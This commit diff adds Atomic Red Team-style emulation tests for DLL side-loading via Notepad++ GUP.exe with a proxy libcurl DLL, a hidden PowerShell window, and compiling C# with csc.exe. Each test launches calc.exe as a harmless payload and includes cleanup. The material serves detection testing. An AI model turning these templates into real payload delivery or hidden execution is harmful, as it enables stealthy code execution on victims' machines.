T1500 compile after delivery (#700)

* Add test for T1073 that does DLL Side-Loading using the Notepad++ GUP.exe binary

* Add test for T1143 that launches a hidden PowerShell Window

* Add test for T1500 that compiles C# code using csc.exe binary

* Add cleanup command for T1500 Compile_After_Delivery

* Add cleanup command for T1143-Hidden_Window

* Add cleanup command for T1073-DLL_Side-Loading

atomics/T1073/T1073.yaml

@@ -0,0 +1,25 @@
+---
+attack_technique: T1073
+display_name: DLL Side-Loading
+
+atomic_tests:
+- name: DLL Side-Loading using the Notepad++ GUP.exe binary
+  description: |
+    GUP is an open source signed binary used by Notepad++ for software updates, and is vulnerable to DLL Side-Loading, thus enabling the libcurl dll to be loaded
+
+  supported_platforms:
+    - windows
+
+  input_arguments:
+    process_name:
+      description: Name of the created process
+      type: string
+      default: calculator.exe
+
+  executor:
+    name: command_prompt
+    elevation_required: false
+    command: |
+      $PathToAtomicsFolder\T1073\bin\GUP.exe
+    cleanup_command: | 
+      taskkill /F /IM #{process_name}

atomics/T1073/src/libcurl.c

@@ -0,0 +1,41 @@
+#include <stdio.h>
+#include <windows.h>
+
+extern __declspec(dllexport) void curl_easy_setopt(void){ return; }
+extern __declspec(dllexport) void curl_easy_cleanup(void) { return; }
+extern __declspec(dllexport) void curl_easy_duphandle(void) { return; }
+extern __declspec(dllexport) void curl_easy_escape(void) { return; }
+extern __declspec(dllexport) void curl_easy_getinfo(void) { return; }
+extern __declspec(dllexport) void curl_easy_init(void) { return; }
+extern __declspec(dllexport) void curl_easy_pause(void) { return; }
+extern __declspec(dllexport) void curl_easy_perform(void) { return; }
+extern __declspec(dllexport) void curl_easy_recv(void) { return; }
+extern __declspec(dllexport) void curl_easy_reset(void) { return; }
+extern __declspec(dllexport) void curl_easy_send(void) { return; }
+extern __declspec(dllexport) void curl_easy_strerror(void) { return; }
+extern __declspec(dllexport) void curl_easy_unescape(void) { return; }
+
+void DllUnregisterServer(void)
+{
+	system("calc.exe");
+	return;
+}
+
+BOOL APIENTRY DllMain(HMODULE hModule, DWORD ul_reason_for_call, LPVOID lol)
+{
+	switch (ul_reason_for_call)
+	{
+	case DLL_PROCESS_ATTACH:
+	{
+		DllUnregisterServer();
+		break;
+	}
+	case DLL_THREAD_ATTACH:
+		break;
+	case DLL_THREAD_DETACH:
+		break;
+	case DLL_PROCESS_DETACH:
+		break;
+	}
+	return TRUE;
+}

atomics/T1143/T1143.yaml

@@ -0,0 +1,29 @@
+---
+attack_technique: T1143
+display_name: Hidden Window
+
+atomic_tests:
+- name: Hidden Window
+  description: |
+    Launch PowerShell with the "-WindowStyle Hidden" argument to conceal PowerShell windows by setting the WindowStyle parameter to hidden.
+
+  supported_platforms:
+    - windows
+
+  input_arguments:
+    powershell_command:
+      description: Command to launch calc.exe from a hidden PowerShell Window
+      type: String
+      default: powershell.exe -WindowStyle hidden calc.exe
+    powershell_process_name:
+      description: Name of the created process
+      type: string
+      default: calculator
+
+  executor:
+    name: powershell
+    elevation_required: false
+    command: | 
+      Start-Process #{powershell_command}
+    cleanup_command: | 
+      Stop-Process -Name "#{powershell_process_name}"

atomics/T1500/T1500.yaml

@@ -0,0 +1,29 @@
+---
+attack_technique: T1500
+display_name: Compile After Delivery
+
+atomic_tests:
+- name: Compile After Delivery using csc.exe
+  description: |
+    Compile C# code using csc.exe binary used by .NET 
+
+  supported_platforms:
+    - windows
+
+  input_arguments:
+    input_file:
+      description: C# code that launches calc.exe from a hidden cmd.exe Window
+      type: file
+      default: $PathToAtomicsFolder\T1500\src\calc.cs
+    output_file:
+      description: Output compiled binary
+      type: file
+      default: C:\Windows\Temp\T1500.exe
+
+  executor:
+    name: command_prompt
+    elevation_required: false
+    command: |
+      C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe /out:#{output_file} #{input_file}
+    cleanup_command: | 
+      del #{output_file}

atomics/T1500/src/calc.cs

@@ -0,0 +1,18 @@
+using System.Diagnostics;
+
+namespace Console
+{
+    class Program
+    {
+        static void Main(string[] args)
+        {
+            var proc = new ProcessStartInfo();
+            proc.UseShellExecute = true;
+            proc.WorkingDirectory = @"C:\Windows\System32";
+            proc.FileName = @"cmd.exe";
+            proc.Arguments = "/c calc.exe";
+            proc.WindowStyle = ProcessWindowStyle.Hidden;
+            Process.Start(proc);
+        }
+    }
+}